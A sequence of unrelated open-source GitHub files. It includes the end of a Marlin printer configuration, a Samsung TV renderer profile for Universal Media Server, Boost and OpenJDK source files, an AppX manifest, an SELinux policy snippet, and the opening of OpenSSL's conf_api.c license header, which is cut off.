#define X2_MICROSTEPS 16 #define X2_OVERCURRENT 2000 #define X2_STALLCURRENT 1500 #define Y_MICROSTEPS 16 #define Y_OVERCURRENT 2000 #define Y_STALLCURRENT 1500 #define Y2_MICROSTEPS 16 #define Y2_OVERCURRENT 2000 #define Y2_STALLCURRENT 1500 #define Z_MICROSTEPS 16 #define Z_OVERCURRENT 2000 #define Z_STALLCURRENT 1500 #define Z2_MICROSTEPS 16 #define Z2_OVERCURRENT 2000 #define Z2_STALLCURRENT 1500 #define E0_MICROSTEPS 16 #define E0_OVERCURRENT 2000 #define E0_STALLCURRENT 1500 #define E1_MICROSTEPS 16 #define E1_OVERCURRENT 2000 #define E1_STALLCURRENT 1500 #define E2_MICROSTEPS 16 #define E2_OVERCURRENT 2000 #define E2_STALLCURRENT 1500 #define E3_MICROSTEPS 16 #define E3_OVERCURRENT 2000 #define E3_STALLCURRENT 1500 #define E4_MICROSTEPS 16 #define E4_OVERCURRENT 2000 #define E4_STALLCURRENT 1500 #endif /** * TWI/I2C BUS * * This feature is an EXPERIMENTAL feature so it shall not be used on production * machines. Enabling this will allow you to send and receive I2C data from slave * devices on the bus. * * ; Example #1 * ; This macro send the string "Marlin" to the slave device with address 0x63 (99) * ; It uses multiple M260 commands with one B<base 10> arg * M260 A99 ; Target slave address * M260 B77 ; M * M260 B97 ; a * M260 B114 ; r * M260 B108 ; l * M260 B105 ; i * M260 B110 ; n * M260 S1 ; Send the current buffer * * ; Example #2 * ; Request 6 bytes from slave device with address 0x63 (99) * M261 A99 B5 * * ; Example #3 * ; Example serial output of a M261 request * echo:i2c-reply: from:99 bytes:5 data:hello */ // @section i2cbus //#define EXPERIMENTAL_I2CBUS #define I2C_SLAVE_ADDRESS 0 // Set a value from 8 to 127 to act as a slave // @section extras /** * Spindle & Laser control * * Add the M3, M4, and M5 commands to turn the spindle/laser on and off, and * to set spindle speed, spindle direction, and laser power. * * SuperPid is a router/spindle speed controller used in the CNC milling community. * Marlin can be used to turn the spindle on and off. It can also be used to set * the spindle speed from 5,000 to 30,000 RPM. * * You'll need to select a pin for the ON/OFF function and optionally choose a 0-5V * hardware PWM pin for the speed control and a pin for the rotation direction. * * See http://marlinfw.org/docs/configuration/laser_spindle.html for more config details. */ //#define SPINDLE_LASER_ENABLE #if ENABLED(SPINDLE_LASER_ENABLE) #define SPINDLE_LASER_ENABLE_INVERT false // set to "true" if the on/off function is reversed #define SPINDLE_LASER_PWM true // set to true if your controller supports setting the speed/power #define SPINDLE_LASER_PWM_INVERT true // set to "true" if the speed/power goes up when you want it to go slower #define SPINDLE_LASER_POWERUP_DELAY 5000 // delay in milliseconds to allow the spindle/laser to come up to speed/power #define SPINDLE_LASER_POWERDOWN_DELAY 5000 // delay in milliseconds to allow the spindle to stop #define SPINDLE_DIR_CHANGE true // set to true if your spindle controller supports changing spindle direction #define SPINDLE_INVERT_DIR false #define SPINDLE_STOP_ON_DIR_CHANGE true // set to true if Marlin should stop the spindle before changing rotation direction /** * The M3 & M4 commands use the following equation to convert PWM duty cycle to speed/power * * SPEED/POWER = PWM duty cycle * SPEED_POWER_SLOPE + SPEED_POWER_INTERCEPT * where PWM duty cycle varies from 0 to 255 * * set the following for your controller (ALL MUST BE SET) */ #define SPEED_POWER_SLOPE 118.4 #define SPEED_POWER_INTERCEPT 0 #define SPEED_POWER_MIN 5000 #define SPEED_POWER_MAX 30000 // SuperPID router controller 0 - 30,000 RPM //#define SPEED_POWER_SLOPE 0.3922 //#define SPEED_POWER_INTERCEPT 0 //#define SPEED_POWER_MIN 10 //#define SPEED_POWER_MAX 100 // 0-100% #endif /** * Filament Width Sensor * * Measures the filament width in real-time and adjusts * flow rate to compensate for any irregularities. * * Also allows the measured filament diameter to set the * extrusion rate, so the slicer only has to specify the * volume. * * Only a single extruder is supported at this time. * * 34 RAMPS_14 : Analog input 5 on the AUX2 connector * 81 PRINTRBOARD : Analog input 2 on the Exp1 connector (version B,C,D,E) * 301 RAMBO : Analog input 3 * * Note: May require analog pins to be defined for other boards. */ //#define FILAMENT_WIDTH_SENSOR #if ENABLED(FILAMENT_WIDTH_SENSOR) #define FILAMENT_SENSOR_EXTRUDER_NUM 0 // Index of the extruder that has the filament sensor. :[0,1,2,3,4] #define MEASUREMENT_DELAY_CM 14 // (cm) The distance from the filament sensor to the melting chamber #define FILWIDTH_ERROR_MARGIN 1.0 // (mm) If a measurement differs too much from nominal width ignore it #define MAX_MEASUREMENT_DELAY 20 // (bytes) Buffer size for stored measurements (1 byte per cm). Must be larger than MEASUREMENT_DELAY_CM. #define DEFAULT_MEASURED_FILAMENT_DIA DEFAULT_NOMINAL_FILAMENT_DIA // Set measured to nominal initially // Display filament width on the LCD status line. Status messages will expire after 5 seconds. //#define FILAMENT_LCD_DISPLAY #endif /** * CNC Coordinate Systems * * Enables G53 and G54-G59.3 commands to select coordinate systems * and G92.1 to reset the workspace to native machine space. */ //#define CNC_COORDINATE_SYSTEMS /** * M43 - display pin status, watch pins for changes, watch endstops & toggle LED, Z servo probe test, toggle pins */ //#define PINS_DEBUGGING /** * Auto-report temperatures with M155 S<seconds> */ #define AUTO_REPORT_TEMPERATURES /** * Include capabilities in M115 output */ #define EXTENDED_CAPABILITIES_REPORT /** * Disable all Volumetric extrusion options */ //#define NO_VOLUMETRICS #if DISABLED(NO_VOLUMETRICS) /** * Volumetric extrusion default state * Activate to make volumetric extrusion the default method, * with DEFAULT_NOMINAL_FILAMENT_DIA as the default diameter. * * M200 D0 to disable, M200 Dn to set a new diameter. */ //#define VOLUMETRIC_DEFAULT_ON #endif /** * Enable this option for a leaner build of Marlin that removes all * workspace offsets, simplifying coordinate transformations, leveling, etc. * * - M206 and M428 are disabled. * - G92 will revert to its behavior from Marlin 1.0. */ //#define NO_WORKSPACE_OFFSETS /** * Set the number of proportional font spaces required to fill up a typical character space. * This can help to better align the output of commands like `G29 O` Mesh Output. * * For clients that use a fixed-width font (like OctoPrint), leave this set to 1.0. * Otherwise, adjust according to your client and font. */ #define PROPORTIONAL_FONT_RATIO 1.0 /** * Spend 28 bytes of SRAM to optimize the GCode parser */ #define FASTER_GCODE_PARSER /** * User-defined menu items that execute custom GCode */ //#define CUSTOM_USER_MENUS #if ENABLED(CUSTOM_USER_MENUS) #define USER_SCRIPT_DONE "M117 User Script Done" #define USER_SCRIPT_AUDIBLE_FEEDBACK //#define USER_SCRIPT_RETURN // Return to status screen after a script #define USER_DESC_1 "Home & UBL Info" #define USER_GCODE_1 "G28\nG29 W" #define USER_DESC_2 "Preheat for PLA" #define USER_GCODE_2 "M140 S" STRINGIFY(PREHEAT_1_TEMP_BED) "\nM104 S" STRINGIFY(PREHEAT_1_TEMP_HOTEND) #define USER_DESC_3 "Preheat for ABS" #define USER_GCODE_3 "M140 S" STRINGIFY(PREHEAT_2_TEMP_BED) "\nM104 S" STRINGIFY(PREHEAT_2_TEMP_HOTEND) #define USER_DESC_4 "Heat Bed/Home/Level" #define USER_GCODE_4 "M140 S" STRINGIFY(PREHEAT_2_TEMP_BED) "\nG28\nG29" #define USER_DESC_5 "Home & Info" #define USER_GCODE_5 "G28\nM503" #endif /** * Specify an action command to send to the host when the printer is killed. * Will be sent in the form '//action:ACTION_ON_KILL', e.g. '//action:poweroff'. * The host must be configured to handle the action command. */ //#define ACTION_ON_KILL "poweroff" /** * Specify an action command to send to the host on pause and resume. * Will be sent in the form '//action:ACTION_ON_PAUSE', e.g. '//action:pause'. * The host must be configured to handle the action command. */ //#define ACTION_ON_PAUSE "pause" //#define ACTION_ON_RESUME "resume" //=========================================================================== //====================== I2C Position Encoder Settings ====================== //=========================================================================== /** * I2C position encoders for closed loop control. * Developed by Chris Barr at Aus3D. * * Wiki: http://wiki.aus3d.com.au/Magnetic_Encoder * Github: https://github.com/Aus3D/MagneticEncoder * * Supplier: http://aus3d.com.au/magnetic-encoder-module * Alternative Supplier: http://reliabuild3d.com/ * * Reilabuild encoders have been modified to improve reliability. */ //#define I2C_POSITION_ENCODERS #if ENABLED(I2C_POSITION_ENCODERS) #define I2CPE_ENCODER_CNT 1 // The number of encoders installed; max of 5 // encoders supported currently. #define I2CPE_ENC_1_ADDR I2CPE_PRESET_ADDR_X // I2C address of the encoder. 30-200. #define I2CPE_ENC_1_AXIS X_AXIS // Axis the encoder module is installed on. <X|Y|Z|E>_AXIS. #define I2CPE_ENC_1_TYPE I2CPE_ENC_TYPE_LINEAR // Type of encoder: I2CPE_ENC_TYPE_LINEAR -or- // I2CPE_ENC_TYPE_ROTARY. #define I2CPE_ENC_1_TICKS_UNIT 2048 // 1024 for magnetic strips with 2mm poles; 2048 for // 1mm poles. For linear encoders this is ticks / mm, // for rotary encoders this is ticks / revolution. //#define I2CPE_ENC_1_TICKS_REV (16 * 200) // Only needed for rotary encoders; number of stepper // steps per full revolution (motor steps/rev * microstepping) //#define I2CPE_ENC_1_INVERT // Invert the direction of axis travel. #define I2CPE_ENC_1_EC_METHOD I2CPE_ECM_MICROSTEP // Type of error error correction. #define I2CPE_ENC_1_EC_THRESH 0.10 // Threshold size for error (in mm) above which the // printer will attempt to correct the error; errors // smaller than this are ignored to minimize effects of // measurement noise / latency (filter). #define I2CPE_ENC_2_ADDR I2CPE_PRESET_ADDR_Y // Same as above, but for encoder 2. #define I2CPE_ENC_2_AXIS Y_AXIS #define I2CPE_ENC_2_TYPE I2CPE_ENC_TYPE_LINEAR #define I2CPE_ENC_2_TICKS_UNIT 2048 //#define I2CPE_ENC_2_TICKS_REV (16 * 200) //#define I2CPE_ENC_2_INVERT #define I2CPE_ENC_2_EC_METHOD I2CPE_ECM_MICROSTEP #define I2CPE_ENC_2_EC_THRESH 0.10 #define I2CPE_ENC_3_ADDR I2CPE_PRESET_ADDR_Z // Encoder 3. Add additional configuration options #define I2CPE_ENC_3_AXIS Z_AXIS // as above, or use defaults below. #define I2CPE_ENC_4_ADDR I2CPE_PRESET_ADDR_E // Encoder 4. #define I2CPE_ENC_4_AXIS E_AXIS #define I2CPE_ENC_5_ADDR 34 // Encoder 5. #define I2CPE_ENC_5_AXIS E_AXIS // Default settings for encoders which are enabled, but without settings configured above. #define I2CPE_DEF_TYPE I2CPE_ENC_TYPE_LINEAR #define I2CPE_DEF_ENC_TICKS_UNIT 2048 #define I2CPE_DEF_TICKS_REV (16 * 200) #define I2CPE_DEF_EC_METHOD I2CPE_ECM_NONE #define I2CPE_DEF_EC_THRESH 0.1 //#define I2CPE_ERR_THRESH_ABORT 100.0 // Threshold size for error (in mm) error on any given // axis after which the printer will abort. Comment out to // disable abort behaviour. #define I2CPE_TIME_TRUSTED 10000 // After an encoder fault, there must be no further fault // for this amount of time (in ms) before the encoder // is trusted again. /** * Position is checked every time a new command is executed from the buffer but during long moves, * this setting determines the minimum update time between checks. A value of 100 works well with * error rolling average when attempting to correct only for skips and not for vibration. */ #define I2CPE_MIN_UPD_TIME_MS 4 // (ms) Minimum time between encoder checks. // Use a rolling average to identify persistant errors that indicate skips, as opposed to vibration and noise. #define I2CPE_ERR_ROLLING_AVERAGE #endif // I2C_POSITION_ENCODERS /** * MAX7219 Debug Matrix * * Add support for a low-cost 8x8 LED Matrix based on the Max7219 chip as a realtime status display. * Requires 3 signal wires. Some useful debug options are included to demonstrate its usage. */ //#define MAX7219_DEBUG #if ENABLED(MAX7219_DEBUG) #define MAX7219_CLK_PIN 64 #define MAX7219_DIN_PIN 57 #define MAX7219_LOAD_PIN 44 //#define MAX7219_GCODE // Add the M7219 G-code to control the LED matrix #define MAX7219_INIT_TEST 2 // Do a test pattern at initialization (Set to 2 for spiral) #define MAX7219_NUMBER_UNITS 1 // Number of Max7219 units in chain. #define MAX7219_ROTATE 0 // Rotate the display clockwise (in multiples of +/- 90°) // connector at: right=0 bottom=-90 top=90 left=180 /** * Sample debug features * If you add more debug displays, be careful to avoid conflicts! */ #define MAX7219_DEBUG_PRINTER_ALIVE // Blink corner LED of 8x8 matrix to show that the firmware is functioning #define MAX7219_DEBUG_PLANNER_HEAD 3 // Show the planner queue head position on this and the next LED matrix row #define MAX7219_DEBUG_PLANNER_TAIL 5 // Show the planner queue tail position on this and the next LED matrix row #define MAX7219_DEBUG_PLANNER_QUEUE 0 // Show the current planner queue depth on this and the next LED matrix row // If you experience stuttering, reboots, etc. this option can reveal how // tweaks made to the configuration are affecting the printer in real-time. #endif /** * NanoDLP Sync support * * Add support for Synchronized Z moves when using with NanoDLP. G0/G1 axis moves will output "Z_move_comp" * string to enable synchronization with DLP projector exposure. This change will allow to use * [[WaitForDoneMessage]] instead of populating your gcode with M400 commands */ //#define NANODLP_Z_SYNC #if ENABLED(NANODLP_Z_SYNC) //#define NANODLP_ALL_AXIS // Enables "Z_move_comp" output on any axis move. // Default behaviour is limited to Z axis only. #endif // Enable Marlin dev mode which adds some special commands //#define MARLIN_DEV_MODE #endif // CONFIGURATION_ADV_H
{ "pile_set_name": "Github" }
/******************************* MODULE HEADER ****************************** * jdhandler.h * Job Directive Handler Module. Handles different job directives * given to us by OEMCommandCallback. * Revision History: * Created: 9/19/96 -- Joel Rieke * ****************************************************************************/ #ifndef _jdhandler_h #define _jdhandler_h BOOL bJDValidatePJLSettings(POEMPDEV pdev); VOID JDEndJob(POEMPDEV pdev); BOOL bJDStartJob(POEMPDEV pdev, PHP5PDEV pHP5pdev); BOOL bJDCopyCheck(POEMPDEV pdev, DWORD copyCntCheck); #endif
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:mp="http://schemas.microsoft.com/appx/2014/phone/manifest" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" IgnorableNamespaces="uap mp"> <Identity Name="Microsoft.SDKSamples.ScreenCasting.CS" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" Version="1.0.0.0" /> <mp:PhoneIdentity PhoneProductId="637456CC-56A1-4C4D-97D5-87AC05C3DFCD" PhonePublisherId="00000000-0000-0000-0000-000000000000" /> <Properties> <DisplayName>ScreenCasting C# Sample</DisplayName> <PublisherDisplayName>Microsoft Corporation</PublisherDisplayName> <Logo>Assets\StoreLogo-sdk.png</Logo> </Properties> <Dependencies> <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.10240.0" MaxVersionTested="10.0.18362.0" /> </Dependencies> <Resources> <Resource Language="x-generate" /> </Resources> <Applications> <Application Id="App" Executable="$targetnametoken$.exe" EntryPoint="ScreenCasting.App"> <uap:VisualElements DisplayName="ScreenCasting C# Sample" Square150x150Logo="Assets\SquareTile-sdk.png" Square44x44Logo="Assets\smallTile-sdk.png" Description="ScreenCasting C# Sample" BackgroundColor="#00b2f0"> <uap:SplashScreen Image="Assets\splash-sdk.png" BackgroundColor="#00b2f0" /> <uap:DefaultTile> <uap:ShowNameOnTiles> <uap:ShowOn Tile="square150x150Logo" /> </uap:ShowNameOnTiles> </uap:DefaultTile> </uap:VisualElements> <Extensions> <uap:Extension Category="windows.dialProtocol"> <uap:DialProtocol Name="screencasting" /> </uap:Extension> </Extensions> </Application> </Applications> <Capabilities> <Capability Name="internetClient" /> <Capability Name="privateNetworkClientServer" /> </Capabilities> </Package>
{ "pile_set_name": "Github" }
module bblfshd 1.0; require { type container_runtime_t; type spc_t; class fifo_file setattr; } #============= spc_t ============== allow spc_t container_runtime_t:fifo_file setattr;
{ "pile_set_name": "Github" }
<?php declare(strict_types = 1); namespace TheSeer\phpDox; interface FactoryInterface { public function getInstanceFor($name); }
{ "pile_set_name": "Github" }
#---------------------------------------------------------------------------- # Profile for Samsung 9 Series TVs. # See DefaultRenderer.conf for descriptions of all the available options. # # Support MPO images as well (image/mpo) # issue: http://www.universalmediaserver.com/forum/posting.php?mode=reply&f=9&t=9249 RendererName = Samsung 9 Series RendererIcon = Samsung-HU9000.png # ============================================================================ # This renderer has sent the following string/s: # # User-Agent: DLNADOC/1.50 SEC_HHP_[TV] Samsung 9 Series (65)/1.0 UPnP/1.0 # friendlyName=[TV] Samsung 9 Series (65) # uuid:aa54de66-0ecd-4936-bd2f-c7b4c381f4f5 # manufacturer=Samsung Electronics # modelName=UE65KS9590 # modelNumber=AllShare1.0 # modelDescription=Samsung TV DMR # manufacturerURL=http://www.samsung.com/sec # modelURL=http://www.samsung.com/sec # ============================================================================ # http://www.samsung.com/us/support/answer/ANS00049952/ # http://www.samsung.com/us/support/answer/ANS00045927/ # http://www.samsung.com/us/support/answer/ANS00049184/ UserAgentSearch = Samsung 9 Series UpnpDetailsSearch = Samsung 9 Series LoadingPriority = 1 TranscodeVideo = MPEGTS-H264-AC3 TranscodeAudio = WAV MaxVideoWidth = 4096 MaxVideoHeight = 2160 SupportedVideoBitDepths = 8,10 H264Level41Limited = false H265Level51Limited = true SeekByTime = exclusive SubtitleHttpHeader = CaptionInfo.sec PrependTrackNumbers = true CharMap = / : MediaInfo = true # Supported video formats: Supported = f:3gp|3g2 v:h264 a:aac-lc|he-aac m:video/3gpp b:60000000 w:3840 h:2160 Supported = f:3gp|3g2 v:h264 a:aac-lc|he-aac m:video/3gpp b:60000000 w:4096 h:2160 Supported = f:3gp|3g2 v:mp4 a:aac-lc|he-aac m:video/3gpp b:20000000 w:1920 h:1080 Supported = f:avi v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:60000000 w:3840 h:2160 gmc:0|1 Supported = f:avi v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:60000000 w:4096 h:2160 gmc:0|1 Supported = f:avi v:mp4|mpeg1|mpeg2|vc1 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:20000000 w:1920 h:1080 gmc:0|1 Supported = f:avi v:h263|vp6|wmv a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:20000000 w:1920 h:1080 gmc:0|1 Supported = f:avi v:mjpeg a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:80000000 w:4096 h:2160 gmc:0|1 Supported = f:divx v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:60000000 w:4096 h:2160 Supported = f:divx v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:60000000 w:3840 h:2160 Supported = f:divx v:mjpeg a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:80000000 w:4096 h:2160 Supported = f:divx v:divx|mp4|mpeg1|mpeg2|vc1 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:20000000 w:1920 h:1080 Supported = f:divx v:h263|vp6|wmv a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:20000000 w:1920 h:1080 Supported = f:flv v:h264 a:aac-lc|he-aac|mp3 m:video/x-flv b:60000000 w:4096 h:2160 Supported = f:flv v:h264 a:aac-lc|he-aac|mp3 m:video/x-flv b:60000000 w:3840 h:2160 Supported = f:flv v:mp4 a:aac-lc|he-aac|mp3 m:video/x-flv b:20000000 w:1920 h:1080 Supported = f:flv v:h263|vp6 a:aac-lc|he-aac|mp3 m:video/x-flv b:20000000 w:1920 h:1080 Supported = f:mkv v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:60000000 w:4096 h:2160 Supported = f:mkv v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:60000000 w:3840 h:2160 Supported = f:mkv v:mp4|vc1 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:20000000 w:1920 h:1080 Supported = f:mkv v:h265 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:80000000 w:4096 h:2160 Supported = f:mkv v:mpeg1|mpeg2 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:20000000 w:1920 h:1080 Supported = f:mkv v:vp6|wmv a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:20000000 w:1920 h:1080 Supported = f:mkv v:h264 a:vorbis m:video/x-mkv n:2 b:60000000 w:3840 h:2160 Supported = f:mkv v:h264 a:vorbis m:video/x-mkv n:2 b:60000000 w:4096 h:2160 Supported = f:mkv v:mp4|vc1 a:vorbis m:video/x-mkv n:2 b:20000000 w:1920 h:1080 Supported = f:mkv v:h265 a:vorbis m:video/x-mkv n:2 b:80000000 w:4096 h:2160 Supported = f:mkv v:mpeg1|mpeg2 a:vorbis m:video/x-mkv n:2 b:20000000 w:1920 h:1080 Supported = f:mkv v:h263|vp6|wmv a:vorbis m:video/x-mkv n:2 b:20000000 w:1920 h:1080 Supported = f:mov v:h263|vp6|wmv a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/quicktime b:20000000 w:1920 h:1080 Supported = f:mp4 v:h265 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3 m:video/mp4 b:80000000 w:4096 h:2160 Supported = f:mp4 v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3 m:video/mp4 b:60000000 w:4096 h:2160 Supported = f:mp4 v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3 m:video/mp4 b:60000000 w:3840 h:2160 Supported = f:mpegps v:mpeg1|mpeg2 a:aac-lc|he-aac|ac3|lpcm|mp3|mpa m:video/mpeg b:20000000 w:1920 h:1080 Supported = f:mpegts v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:60000000 w:4096 h:2160 Supported = f:mpegts v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:60000000 w:3840 h:2160 Supported = f:mpegts v:mp4 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:20000000 w:1920 h:1080 Supported = f:mpegts v:h265 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:80000000 w:4096 h:2160 Supported = f:mpegts v:mpeg2 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:20000000 w:1920 h:1080 Supported = f:rm a:cook m:video/vnd.rn-realvideo b:20000000 w:1920 h:1080 Supported = f:webm v:vp8 a:vorbis m:video/webm n:2 b:20000000 w:1920 h:1080 Supported = f:webm v:vp9 a:vorbis m:video/webm n:2 b:40000000 w:4096 h:2160 Supported = f:wmv|asf v:mp4|vc1|vp6|wmv a:wma|wma10|wmapro m:video/x-ms-wmv b:20000000 w:1920 h:1080 # Supported audio formats: Supported = f:aiff m:audio/L16 Supported = f:ape Supported = f:flac n:2 Supported = f:m4a a:(?!alac) Supported = f:m4a a:alac m:audio/x-m4a Supported = f:mp3 Supported = f:oga a:vorbis n:2 Supported = f:wma Supported = f:wav # Supported subtitles formats: SupportedExternalSubtitlesFormats = MICRODVD,SAMI,SUBRIP,TEXT SupportedInternalSubtitlesFormats = ASS,DIVX,SUBRIP,VOBSUB
{ "pile_set_name": "Github" }
// Copyright Neil Groves 2009. Use, modification and // distribution is subject to the Boost Software License, Version // 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) // // // For more information, see http://www.boost.org/libs/range/ // #ifndef BOOST_RANGE_ALGORITHM_REMOVE_COPY_IF_HPP_INCLUDED #define BOOST_RANGE_ALGORITHM_REMOVE_COPY_IF_HPP_INCLUDED #include <boost/concept_check.hpp> #include <boost/range/begin.hpp> #include <boost/range/end.hpp> #include <boost/range/concepts.hpp> #include <algorithm> namespace boost { /// \brief template function remove_copy_if /// /// range-based version of the remove_copy_if std algorithm /// /// \pre SinglePassRange is a model of the SinglePassRangeConcept /// \pre OutputIterator is a model of the OutputIteratorConcept /// \pre Predicate is a model of the PredicateConcept /// \pre InputIterator's value type is convertible to Predicate's argument type /// \pre out_it is not an iterator in the range rng template< class SinglePassRange, class OutputIterator, class Predicate > inline OutputIterator remove_copy_if(const SinglePassRange& rng, OutputIterator out_it, Predicate pred) { BOOST_RANGE_CONCEPT_ASSERT(( SinglePassRangeConcept<const SinglePassRange> )); return std::remove_copy_if(boost::begin(rng), boost::end(rng), out_it, pred); } } #endif // include guard
{ "pile_set_name": "Github" }
/*============================================================================= Copyright (c) 2001-2011 Joel de Guzman Copyright (c) 2001-2011 Hartmut Kaiser http://spirit.sourceforge.net/ Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) =============================================================================*/ #ifndef BOOST_SPIRIT_INCLUDE_QI_LIT #define BOOST_SPIRIT_INCLUDE_QI_LIT #if defined(_MSC_VER) #pragma once #endif #include <boost/spirit/home/qi/string/lit.hpp> #endif
{ "pile_set_name": "Github" }
/* * Copyright (c) 2003, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package sun.management; /** */ @Deprecated public class CompilerThreadStat implements java.io.Serializable { private String name; private long taskCount; private long compileTime; private MethodInfo lastMethod; CompilerThreadStat(String name, long taskCount, long time, MethodInfo lastMethod) { this.name = name; this.taskCount = taskCount; this.compileTime = time; this.lastMethod = lastMethod; }; /** * Returns the name of the compiler thread associated with * this compiler thread statistic. * * @return the name of the compiler thread. */ public String getName() { return name; } /** * Returns the number of compile tasks performed by the compiler thread * associated with this compiler thread statistic. * * @return the number of compile tasks performed by the compiler thread. */ public long getCompileTaskCount() { return taskCount; } /** * Returns the accumulated elapsed time spent by the compiler thread * associated with this compiler thread statistic. * * @return the accumulated elapsed time spent by the compiler thread. */ public long getCompileTime() { return compileTime; } /** * Returns the information about the last method compiled by * the compiler thread associated with this compiler thread statistic. * * @return a {@link MethodInfo} object for the last method * compiled by the compiler thread. */ public MethodInfo getLastCompiledMethodInfo() { return lastMethod; } public String toString() { return getName() + " compileTasks = " + getCompileTaskCount() + " compileTime = " + getCompileTime(); } private static final long serialVersionUID = 6992337162326171013L; }
{ "pile_set_name": "Github" }
/* * reserved comment block * DO NOT REMOVE OR ALTER! */ /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.sun.org.apache.bcel.internal.generic; /** * SASTORE - Store into short array * <PRE>Stack: ..., arrayref, index, value -&gt; ...</PRE> * * @version $Id$ */ public class SASTORE extends ArrayInstruction implements StackConsumer { public SASTORE() { super(com.sun.org.apache.bcel.internal.Const.SASTORE); } /** * Call corresponding visitor method(s). The order is: * Call visitor methods of implemented interfaces first, then * call methods according to the class hierarchy in descending order, * i.e., the most specific visitXXX() call comes last. * * @param v Visitor object */ @Override public void accept( final Visitor v ) { v.visitStackConsumer(this); v.visitExceptionThrower(this); v.visitTypedInstruction(this); v.visitArrayInstruction(this); v.visitSASTORE(this); } }
{ "pile_set_name": "Github" }
commandlinefu_id: 4276 translator: weibo: '' hide: true command: |- mencoder infile.wmv -ofps 23.976 -ovc lavc -oac copy -o outfile.avi summary: |- Convert wmv into avi
{ "pile_set_name": "Github" }
/* conf_api.c */ /* Copyright (C) 1995-1998 Eric Young ([email protected]) * All rights reserved. * * This package is an SSL implementation written * by Eric Young ([email protected]). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson ([email protected]). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young ([email 